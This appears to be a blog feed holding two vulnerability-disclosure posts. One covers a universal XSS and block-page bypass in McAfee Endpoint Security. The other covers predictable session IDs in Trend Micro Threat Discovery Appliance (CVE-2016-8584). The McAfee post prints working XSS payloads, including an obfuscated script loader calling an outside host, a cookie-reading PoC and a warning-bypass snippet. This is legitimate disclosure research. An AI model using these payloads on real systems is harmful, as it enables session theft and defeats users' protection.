tag:blogger.com,1999:blog-55931080609414259082024-03-05T14:25:38.322+01:00malerisch.netSecurity research, divulgations and food for thought.Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.comBlogger28125tag:blogger.com,1999:blog-5593108060941425908.post-63444250460607557512017-04-26T11:52:00.000+02:002017-05-03T14:45:22.238+02:00UXSS in McAfee Endpoint Security, www.mcafee.com and some extra goodies...During the <a href="https://conference.hitb.org/hitbsecconf2017ams/sessions/trending-a-micro-line-how-we-found-over-100-rce-vulnerabilities-in-trend-micro-software/">HITB2017AMS talk</a> given in Amsterdam with <a href="https://www.twitter.com/steventseeley">@Steventseeley</a>, I promised that I would have disclosed vulnerabilities affecting a security vendor product other than Trend Micro.<br />
<br />
For those who have come to my blog for the first time and are looking at "insecurities" of security vendors, you might be interested as well on <a href="https://www.slideshare.net/robertosl81/i-got-99-trends-and-a-is-all-of-them">how we found 200+ remote code execution vulnerabilities in Trend Micro software</a>...<br />
<br />
But this blog post is dedicated to two McAfee products instead: McAfee Endpoint Security and SiteAdvisor Enterprise (now part of McAfee Endpoint Security). For simplicity, I will just refer to McAfee Endpoint Security for the rest of this post.<br />
<br />
First let's demonstrate a particular type of XSS, a UXSS, considering that fact that it only affects the McAfee Endpoint Security plugin and does not depend on a particular web site or web application.<br />
<br />
There are two different injection points:<br />
<br />
-<span class="Apple-tab-span" style="white-space: pre;"> </span>UXSS when user visits a red labelled web site - the payload is rendered in the BlockPage.html<br />
-<span class="Apple-tab-span" style="white-space: pre;"> </span>UXSS when a user is prompted with a warn page (Zero Day) Protection - the payload is rendered in the WarnPromptPage.html<br />
<br />
<b>1)<span class="Apple-tab-span" style="white-space: pre;"> </span>UXSS – Block page</b><br />
<div>
<div>
<br /></div>
<div>
When a red labelled site is requested by a browser, McAfee Endpoint will present a block page to the user, as shown below:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTrmXQgj6d-lqNdf-I2EBeUE0lh7NJjg6CTFutM6pF6Wu7lpLaPRDg_NDeR9-zMoqwf6YhPzeW60eGyhjibEF_j0xtr3LB1zbq5xT-3ijN2N_CiL_aZ_-5N88hSTiLUth2iYNeMM8vM6o/s1600/s1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTrmXQgj6d-lqNdf-I2EBeUE0lh7NJjg6CTFutM6pF6Wu7lpLaPRDg_NDeR9-zMoqwf6YhPzeW60eGyhjibEF_j0xtr3LB1zbq5xT-3ijN2N_CiL_aZ_-5N88hSTiLUth2iYNeMM8vM6o/s640/s1.png" width="640" /></a></div>
<div>
</div>
<div>
In case the user clicks or is forcibly redirected to an URL of a domain labelled as "red" and a XSS payload is added to the URL as:<br />
<br />
http://red.cms.test-center.org/?id=xsspayloadhere<br />
<br />
Then such XSS payload will be rendered within the sacore:BlockPage.html page, as shown below:</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLJ4qsSP7ATy4dmiJr6NkGUZZ6SEueXF6qS8uJKQ4pam2TU0-aOuGVy1CZwMSgEc1DeCa2U5rZzpJrjj37E5J9UulqqJiz3wqfuY09UL-Dd82Pau-_Jx7R-uBVV_dFBtwUWEV1rEAWd48/s1600/s2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLJ4qsSP7ATy4dmiJr6NkGUZZ6SEueXF6qS8uJKQ4pam2TU0-aOuGVy1CZwMSgEc1DeCa2U5rZzpJrjj37E5J9UulqqJiz3wqfuY09UL-Dd82Pau-_Jx7R-uBVV_dFBtwUWEV1rEAWd48/s640/s2.png" width="640" /></a></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div>
<b>http://red.test.csm-testcenter.org/?id=<img src=a onerror=alert(document.location)></b></div>
<div>
<br /></div>
User is automatically redirected to the sacore:BlockPage.html page.<br />
<br />
The universality of this type of XSS is given by the fact that any domain (red or unknown) can be used with an arbitrary XSS payload, and the site does not need to be vulnerable to XSS. The vulnerability affects the internal component of sacore: zone and therefore the native IE XSS Filter does not trigger, since the zone is considered more secure than "Internet" zone.</div>
</div>
<div>
<br /></div>
<div>
<div>
2)<span class="Apple-tab-span" style="white-space: pre;"> </span><b>UXSS – Warning page</b></div>
<div>
<br /></div>
<div>
McAfee Site Endpoint provides a warning message in case a user requests a web page from an unknown domain or a domain which has not been “analysed” by McAfee yet. This occurs when in EPO (ePolicy Orchestrator) the Zero Day policy is set as “Warn” mode.</div>
<div>
<br /></div>
<div>
This warning page prompts the user to make a choice, whether to continue browsing to the site or cancel the navigation.</div>
<div>
<br /></div>
<div>
The standard screen shot can be seen below:</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYZVq9-n24zqoQUrvKOgt0zg7gevVwT3LK9rInKb1uytSMwLUcshl-cxK6Ryvi-2QIP7NNycQSQM5PLDgIuwQosaKHNnGrboPBWzlYL4oR4YLNpR4Z-GSK2Oc-qw4_uSvl-UoEJInEmCU/s1600/s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYZVq9-n24zqoQUrvKOgt0zg7gevVwT3LK9rInKb1uytSMwLUcshl-cxK6Ryvi-2QIP7NNycQSQM5PLDgIuwQosaKHNnGrboPBWzlYL4oR4YLNpR4Z-GSK2Oc-qw4_uSvl-UoEJInEmCU/s640/s3.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As in the previous case, a URL as below will lead to UXSS in the WarnPromptPage.html page:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
http://mkasdhsa87283721ijikshdaisohdsauiyd.com/?q=<img src=a onerror=alert(document.location)></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Also in this case, the user is automatically redirected to the Zero day protection warning page:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxios9WWmvag4YWfdRFp2Ibcm0mXKUHf3lL2q3O84RM9fAE4hQ0VGsmVwrTkqyfc-x8TdVxbAgmlh3H7ze-uZGc4SG72mTDpd4faEqHAC_E_LqgpD2-zasz9lB61YvR9AtFTemS8dq-Zw/s1600/s4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="377" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxios9WWmvag4YWfdRFp2Ibcm0mXKUHf3lL2q3O84RM9fAE4hQ0VGsmVwrTkqyfc-x8TdVxbAgmlh3H7ze-uZGc4SG72mTDpd4faEqHAC_E_LqgpD2-zasz9lB61YvR9AtFTemS8dq-Zw/s640/s4.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
Some readers might argue that only certain sites fall under "block" or "warn" category, and therefore this might not be considered a "full" UXSS. However, the attacker has the choice of the URL and if a block or warn site is chosen, the injection will <u>always</u> occur in the sacore: zone.<br />
<br />
And now, let's dive in the part where we can reach a XSS condition into <u><b>www.mcafee.com</b></u> web site by chaining a further behavior in the extension and without bypassing the Same of Origin policy (SOP)!</div>
<div>
<div>
<b><br /></b></div>
<div>
<b>UXSS in www.mcafee.com case</b></div>
<div>
<br /></div>
<div>
The web site serves a page named BlockPageGC.html at the following URL: <a href="http://www.mcafee.com/SAE/BlockPageGC.html">http:www.mcafee.com/SAE/BlockPageGC.html</a></div>
<div>
<br /></div>
<div>
This page is typically requested by McAfee Endpoint Security with a valid ID entry:</div>
<div>
<br /></div>
<div>
Example: http://<b><u>www.mcafee.com</u></b>/SAE/<b><u>BlockPageGC.html</u></b>?id=<b><u>validID:here</u></b></div>
<div>
<br /></div>
<div>
The page contains the following source code: </div>
</div>
<div>
<br /></div>
<div>
<div>
<i><html xmlns="http://www.w3.org/1999/xhtml"></i></div>
<div>
<i><!-----------------------------------------------------------------------------</i></div>
<div>
<i>* blockpage.html </i></div>
<div>
<i>* Copyright 2007, McAfee Inc. All Rights Reserved. </i></div>
<div>
<i>* kiykiogt</i></div>
<div>
<i> ------------------------------------------------------------------------------></i></div>
<div>
<i>[SNIP]</i></div>
<div>
<i> <td align="center"></i></div>
<div>
<i> <div id="header"></i></div>
<div>
<i> <div id="logoImage" style="display:none">x</div> </i></div>
<div>
<i> </div></i></div>
<div>
<i> <div class="vspacing1"></div></i></div>
<div>
<i> <div id="main" style="display:none;"></i></div>
<div>
<i> <div id="actionText"></div></i></div>
<div>
<i> <div id="saDomainText" style="margin-bottom:14px;"></div></i></div>
<div>
<i> <div id="actionDetailText" style="margin-bottom:14px;"></div></i></div>
<div>
<i> <div id="actionDetailAltText" style="margin-bottom:14px;"></div></i></div>
<div>
<i> <div id="dssContentText"></div></i></div>
<div>
<i> <div id="dssSecurityText"></div></i></div>
<div>
<i> <table style="padding-top:14px;text-align:center;" border="0" cellpadding="0" cellspacing="0" width="100%"></i></div>
<div>
<i> <tr></i></div>
<div>
<i> <td align="center"></i></div>
<div>
<i>[SNIP]</i></div>
</div>
<div>
<br /></div>
<div>
<div>
When McAfee Endpoint Security extension parses the <div> element with ID “saDomainText”, it will then fetch the ID from the internal SAEVisits.dat SQLite database and populate the <div> element content.<br />
<br />
If the ID matches a stored XSS payload entry in the database, inserted by a malicious user as described above, then it is possible to render XSS payload within the <b><u>www.mcafee.com</u></b> web site as well.</div>
<div>
<br /></div>
<div>
In the screen shot below, it is possible to see the injection in the DOM of the page on the <u><b>www.mcafee.com</b></u> web site. The injection is within <div> element with id “saDomainText”:</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPVgLvpCLgmYvERPu8MmC5i-MQeAHR1Q4OjfKPvNYJYdmVeLBf0qe7xSHFwlWcRz5zCjfNZ7wju1I4grUijT_3l0B-ZG54_KsZmXEH69cTZx0bMqSUJoyCe0NTylPwH8Gf8EXgERtpIz8/s1600/s5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="627" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPVgLvpCLgmYvERPu8MmC5i-MQeAHR1Q4OjfKPvNYJYdmVeLBf0qe7xSHFwlWcRz5zCjfNZ7wju1I4grUijT_3l0B-ZG54_KsZmXEH69cTZx0bMqSUJoyCe0NTylPwH8Gf8EXgERtpIz8/s640/s5.png" width="640" /></a></div>
<div>
<div>
<br /></div>
<div>
This attack can be reproduced as following:</div>
<div>
<br /></div>
<div>
Target user is redirected to a link such as:</div>
</div>
<div>
<br /></div>
<div>
<a href="http://yellow.test.csm-testcenter.org/?q3=%3Cimg%20src=b%20onerror=%27a=document.createElement(String.fromCharCode(115,99,114,105,112,116));a.setAttribute(String.fromCharCode(115,114,99),String.fromCharCode(104,%20116,%20116,%20112,%20115,%2058,%2047,%2047,%20119,%20104,%2097,%20116,%20101,%20118,%20101,%20114,%20115,%20105,%20116,%20101,%2047,%20106,%2046,%20106,%20115));document.body.appendChild(a)%27%3E">http://yellow.test.csm-testcenter.org/?q3=<img src=b onerror='a=document.createElement(String.fromCharCode(115,99,114,105,112,116));a.setAttribute(String.fromCharCode(115,114,99),String.fromCharCode(104,116,116,112,115,58,47,47,119, 104,97,116,101,118,101,114,115,105,116,101,47,106, 46,106,115));document.body.appendChild(a)'></a><br />
<br />
Which simplified is:<br />
<br />
<i><img src=b onerror='a=document.createElement("script");a.setAttribute("src","https://whateversite/j.js");document.body.appendChild(a)'></i><br />
<br />
This is a mandatory step, since a database entry needs to be created within the SAEVisits.dat, storing the XSS payload first. Once the entry is stored, then the XSS logic can follow. In this case, the malicious site hosts a j.js file (as example). An example of j.js file is below:</div>
<div>
<br /></div>
<div>
<div>
<i>function blockGC() {</i></div>
<div>
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>if (window.location.pathname == "WarnPromptPage.html") {</i></div>
<div>
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>alert("[+] Injecting into: "+window.location);</i></div>
<div>
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>alert("[+] Dumping body.innerHTML: "+document.body.innerHTML)</i></div>
<div>
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>window.location="http://www.mcafee.com/SAE/BlockPageGC.html?id="+window.location.href.substr(30,23)</i></div>
<div>
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>}</i></div>
<div>
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>if (window.location.hostname == "www.mcafee.com") { </i></div>
<div>
<i><br /></i></div>
<div>
<i><span class="Apple-tab-span" style="white-space: pre;"> </span>alert("[+] Successful redirection, now injecting into: "+window.location+document.cookie);</i></div>
<div>
<i>}</i></div>
<div>
<span class="Apple-tab-span" style="white-space: pre;"><i> </i></span></div>
<div>
<i>}</i></div>
<div>
<i><br /></i></div>
<div>
<i>blockGC()</i></div>
</div>
<div>
<br /></div>
<div>
<div>
The payload is a PoC (proof of concept) which first shows the injection within the warnpromptpage.html and then performs a redirection to the www.mcafee.com/SAE/BlockPageGC.html page, with a valid ID.</div>
<div>
<br /></div>
<div>
Then, the XSS is rendered within the www.mcafee.com web site. A video shows the full PoC in action:</div>
</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i9.ytimg.com/vi/cwMxVx5S3KA/default.jpg?sqp=CNSX_ccF&rs=AOn4CLDxPxHi9qg42jXCJy9Q44UfIdguXQ" frameborder="0" height="266" src="https://www.youtube.com/embed/cwMxVx5S3KA?feature=player_embedded" width="320"></iframe></div>
<br />
<br />
<h2>
<a href="https://youtu.be/cwMxVx5S3KA">Video Link</a></h2>
But the UXSS can be used in some many other ways - for instance, in the warning page case, it is possible to automatically "Continue" to the "potential" malicious site without letting the target user making the choice, hence bypassing the "prevention" control of McAfee Endpoint Security.<br />
<br />
The following XSS payload will be enough to bypass/skip the warning:<br />
<br />
<i>function bypasswarn(){</i><br />
<i>if (window.location.pathname = "warnpromptpage.html") {</i><br />
<i>document.forms[1].submit()</i><br />
<i>}</i><br />
<i>}</i><br />
<br />
<br />
<b>What about also bypassing "block" pages?</b></div>
<div>
<br /></div>
<div>
<div>
Technically speaking, there is no bypass because IE browser fetches the web page anyway before McAfee Endpoint Security shows a warning or a block page. The warning/block page is displayed to the user after a redirection into the sacore: zone (as we saw in the examples below). Since the redirection occurs very quickly, a normal user would not realize what is happening and has the look/feeling that McAfee is triggering the protection "before" the site is viewed.<br />
<br />
However, as a proof of concept it is possible to prevent the redirection to the block or warning pages (served within the zone sacore://). This can be achieved using different means, like a JavaScript snippet that delays the redirection through a popup. By doing this, after a determined amount of time, the McAfee Endpoint Security warn/block page is not loaded (at least in Internet Explorer 11).</div>
<div>
<br /></div>
<div>
Therefore, it is possible to fully navigate to a red (blocked) or (warned) site without triggering the Endpoint protection, allowing also other scenarios, like corporate users browsing forbidden sites by policies, etc.</div>
<div>
<br /></div>
<div>
In the example below, a red labelled site has a popup window via alert() when the page is loaded, preventing the browser to be redirected to the sacore:// McAfee Endpoint Security page:</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHbq_GV8xqcrGdAr5sHm9otuB6GP3hXav3Rdsc_v0spEo5sBt6I3RazpAIQtdi8Bf_enWDNsNekFGlheSp1gqUxVV-PwzkUm1zofvQOD0-S4ZPddx36BLqK1x7h2Ceif9cmRGu5pj-Cw8/s1600/s6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="412" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHbq_GV8xqcrGdAr5sHm9otuB6GP3hXav3Rdsc_v0spEo5sBt6I3RazpAIQtdi8Bf_enWDNsNekFGlheSp1gqUxVV-PwzkUm1zofvQOD0-S4ZPddx36BLqK1x7h2Ceif9cmRGu5pj-Cw8/s640/s6.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkwYo1ULHysqmhANS3W1UWzkxk2nsgOHGnhepBNPECtQBiQnifumvaxFeJhrFg87wNDz46tr6AhXCA2II8Vm_HIB-59WvjR4ZLSqgQPWv3WJo8S8IPHlviqlVhohpjVz-tX25W1tuQ4WM/s1600/s7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkwYo1ULHysqmhANS3W1UWzkxk2nsgOHGnhepBNPECtQBiQnifumvaxFeJhrFg87wNDz46tr6AhXCA2II8Vm_HIB-59WvjR4ZLSqgQPWv3WJo8S8IPHlviqlVhohpjVz-tX25W1tuQ4WM/s640/s7.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
The same attack has been carried out against the Warning page, as shown below:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjogqFblTvd0a82zNY_zwxv4W8hJrPof2M1atTKNersyjYg1SJ_iw9sY0h4MF3zJFu-6Px8Yt7E4Pu8hsCeRTfP1993-8EXjTxduuSZLJTN_-5jHAPi20z0nXXfsF3YHIHJP55W3DjiQOs/s1600/s8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjogqFblTvd0a82zNY_zwxv4W8hJrPof2M1atTKNersyjYg1SJ_iw9sY0h4MF3zJFu-6Px8Yt7E4Pu8hsCeRTfP1993-8EXjTxduuSZLJTN_-5jHAPi20z0nXXfsF3YHIHJP55W3DjiQOs/s640/s8.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikDFyKZBfb0m_XeZaYETFrund1-apbveMCaJQuB1c-hzSIddQWG59GgOfkVDODjDWIMT4QqcWwxoDi7TjA_LWTJqtBj8xWM_y_FoDK8u0XAX7SkFNbR-kuh_9-YR5SbDdoB82S_FNtqrc/s1600/s9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikDFyKZBfb0m_XeZaYETFrund1-apbveMCaJQuB1c-hzSIddQWG59GgOfkVDODjDWIMT4QqcWwxoDi7TjA_LWTJqtBj8xWM_y_FoDK8u0XAX7SkFNbR-kuh_9-YR5SbDdoB82S_FNtqrc/s640/s9.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
By using this or similar technique, an attacker can serve a browser-based exploit and bypass McAfee Endpoint Security protection for both blocked sites and “zero-day” warning sites.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But it is not finished yet.... you would assume that some kind of DNS checking and resolving is performed? </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
From the behavior we saw before, the answer is no, since the web page is loaded by the browser first...so DNS resolution has already occurred.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
McAfee Endpoint only performs a string comparison of the host, to provide extra features, such as search engine results protection and no DNS resolution or correlation is performed.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
In a situation where the user has a DNS compromised or his/her connection is not secure and a MiTM attack is undergoing, it would be possible to fully bypass the protection offered by Endpoint Security.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
In this case, the user has its DNS compromised and www.google.com resolves to a server controlled by a malicious user. Even though the request is performed over HTTP, McAfee does not check the authenticity of the site/domain.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmJAd6P7xlxHYkBs7Rb9dVh6fs3doVDHKAjWpneLYJD_ca7bYz07Vr4StVN0WV53kSyiCJLriKqyT7ipv05XXzcxRPsdNnUixya5Yc-EaR4gUU5iix6v1CloZtZtrcg8GSZGgx5jdySFo/s1600/s10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="470" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmJAd6P7xlxHYkBs7Rb9dVh6fs3doVDHKAjWpneLYJD_ca7bYz07Vr4StVN0WV53kSyiCJLriKqyT7ipv05XXzcxRPsdNnUixya5Yc-EaR4gUU5iix6v1CloZtZtrcg8GSZGgx5jdySFo/s640/s10.png" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
Last but not least, McAfee Endpoint Security creates the “bullet” icon to categorise sites in search engine results. In a MiTM context, it is possible to bypass the check by changing HREF src value based on DOM events, such as onmouseover, as it can be seen below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxhFEywA8yyd07iyo87-IRJmFQY-pIjkKg0oEDmWtSGtoFapBq1_KqVK9vvSJl60tSxldVNBm6aoiRiFA6s_rtxj_vxawQ9oRwgxKJzKLhzPpsEPNC-gWVFn8JEq3RrRPJZTy49BsNjpc/s1600/s11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxhFEywA8yyd07iyo87-IRJmFQY-pIjkKg0oEDmWtSGtoFapBq1_KqVK9vvSJl60tSxldVNBm6aoiRiFA6s_rtxj_vxawQ9oRwgxKJzKLhzPpsEPNC-gWVFn8JEq3RrRPJZTy49BsNjpc/s640/s11.png" width="500" /></a></div>
<br />
<br />
Source code:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkLGvQVmxyIxmIZBc1ghqu_sCQZbyr-qTlcicu9mNpLL44aMPJ_iAxv4Ph_EBAANitKtAbWnZjAkSQR9JTyxCcC71QRq88dwQbP_8Urk1R9yZ9H54snOwEka8zk5mEHPeRWlppBo0oBio/s1600/s12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkLGvQVmxyIxmIZBc1ghqu_sCQZbyr-qTlcicu9mNpLL44aMPJ_iAxv4Ph_EBAANitKtAbWnZjAkSQR9JTyxCcC71QRq88dwQbP_8Urk1R9yZ9H54snOwEka8zk5mEHPeRWlppBo0oBio/s640/s12.png" width="640" /></a></div>
<br />
Since the “wikipedia” site (https://en.wikipedia.org/) is a whitelisted address, the McAfee Secure bullet is added, however, when the onmouseover event is triggered, McAfee does not have a check to detect if the HREF value has dynamically changed, luring the user into clicking a "trusted" site.<br />
<br />
After reporting all these issues to McAfee, McAfee produced a single CVE for the UXSS, as outlined <a href="https://kc.mcafee.com/corporate/index?page=content&id=SB10180">here</a>.<br />
<br />
The vulnerable which should be now patched are: Endpoint Security 10.2 and SiteAdvisor Enterprise 3.5. These vulnerabilities were only confirmed when using IE11 (Edge mode) (IE 11.0.9600.18499).<br />
<br />
The issues do not trigger when using Firefox or Chrome for example, on the same versions of McAfee Endpoint Security or SiteAdvisor Enterprise.<br />
<br />
Interestingly enough, recently, there was a similar XSS condition in a different McAfee product which resulted in a similar impact:<br />
<br />
<a href="https://blog.cybermtl.org/near-universal-xss-in-mcafee-web-gateway-cf8dfcbc8fc3">https://blog.cybermtl.org/near-universal-xss-in-mcafee-web-gateway-cf8dfcbc8fc3</a><br />
<br />
So I think I kept my promise that I did during HITB2017AMS!<br />
<br />
For those of you have been reading up to here, thanks!<br />
<br />
If you like my work/research, please follow me on Twitter - <a href="https://www.twitter.com/malerisch">@malerisch</a><br />
<br />
<b>References:</b><br />
<br />
Subverting Ajax: <a href="https://events.ccc.de/congress/2006/Fahrplan/attachments/1158-Subverting_Ajax.pdf">https://events.ccc.de/congress/2006/Fahrplan/attachments/1158-Subverting_Ajax.pdf</a><br />
<br />
<br />
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com0tag:blogger.com,1999:blog-5593108060941425908.post-25294235998388743352017-04-20T09:59:00.000+02:002017-05-03T14:45:54.933+02:00Trend Micro Threat Discovery Appliance - Session Generation Authentication Bypass (CVE-2016-8584)In the last few months, I have been testing several Trend Micro products with Steven Seeley (<a href="https://twitter.com/steventseeley">@steventseeley</a>). Together, we have found more than 200+ RCE (Remote Code Execution) vulnerabilities and for the first time we presented the outcome of our research at <a href="https://conference.hitb.org/hitbsecconf2017ams/sessions/trending-a-micro-line-how-we-found-over-100-rce-vulnerabilities-in-trend-micro-software/">Hack In The Box 2017 Amsterdam</a> in April.<br />
<br />
The presentation is available as a <a href="http://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Steven%20Seeley%20and%20Roberto%20Suggi%20Liverani%20-%20I%20Got%2099%20Trends%20and%20a%20%23%20Is%20All%20Of%20Them.pdf">PDF</a> or as a <a href="https://www.slideshare.net/robertosl81/i-got-99-trends-and-a-is-all-of-them">Slideshare</a>.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="470px" marginheight="0" marginwidth="0" mozallowfullscreen="" scrolling="no" src="https://www.slideshare.net/robertosl81/slideshelf" style="border: none;" webkitallowfullscreen="" width="615px"></iframe>
<br />
Since it was not possible to cover all discovered vulnerabilities with a single presentation, this blog post will cover and analyze a further vulnerability that did not make it to the slides, and which affects the Trend Micro Threat Discovery Appliance (TDA) product.<br />
<br />
<b>CVE-2016-8584 - TDA Session Generation Authentication Bypass</b><br />
<br />
This was an interesting vulnerability, discovered after observing that two consecutive login attempts against the web interface returned the same session_id token. Following this observation, our inference was that time factor played a role. After further analysis and reversing of the TDA libraries, the session management was found to be defined in the following library: /opt/TrendMicro/MinorityReport/lib/mini_httpd/utils.so<br />
<div>
<br /></div>
<div>
Within this library, the create_session() function is of particular interest, as shown below.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgXqASmgcOuD0WbIpO1bAWXrk5mrB39QPUHqP3AMMmdJ9vQjuB3YjrKLgQgDw4ycTKBr_w_lcXp3gjD2H3YR5GSykkRvjdL-AYtHDWNIL5_32jUy4YeSg90IFo42w1sGM_8bE8nzUFeHg/s1600/create_session.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgXqASmgcOuD0WbIpO1bAWXrk5mrB39QPUHqP3AMMmdJ9vQjuB3YjrKLgQgDw4ycTKBr_w_lcXp3gjD2H3YR5GSykkRvjdL-AYtHDWNIL5_32jUy4YeSg90IFo42w1sGM_8bE8nzUFeHg/s400/create_session.png" width="338" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj50474hOY1gL4aogLiGVXy492h7HY4aJO7kv5TSwhPvdIadOaXCsfpVNK772WWaQxzW_UAk9fNLZ2U2943aYA2XDCQrr76TKCWq0UkiOwMo11wf2kEz73YwZ6UnBKTk3dIpj9vTIYfCOU/s1600/create_session2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="382" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj50474hOY1gL4aogLiGVXy492h7HY4aJO7kv5TSwhPvdIadOaXCsfpVNK772WWaQxzW_UAk9fNLZ2U2943aYA2XDCQrr76TKCWq0UkiOwMo11wf2kEz73YwZ6UnBKTk3dIpj9vTIYfCOU/s400/create_session2.png" width="400" /></a></div>
<br />
This function performs the following actions:<br />
<br />
- Gets current time<br />
- Use time as “seed”<br />
- Use srand() with above seed<br />
- MD5 hash the rest<br />
<br />
All these functions can be shortened as the following: <i>session_id = md5(srand(get_curtime()))</i><br />
<br />
The vulnerability is that the seed is predictable, and therefore an attacker can generate session IDs issued in the past.<br />
<br />
However, there are two conditions which affect exploitation of this vulnerability:<br />
<br />
1) A legitimate user has to be authenticated - a session token is associated with an IP address when a user logs in<br />
2) Attacker needs to perform the attack with the same IP address of legitimate user<br />
<br />
The second condition is not an issue in a NATed environment but in a different environment it's definitely the most significant constraint.<br />
<br />
A further conclusion is that although the attacker is able to technically predict "future" session_id tokens, there is no point in doing that, since condition (1) has to be to met first and an association between an IP address and session_id has to exist in the database.<br />
<br />
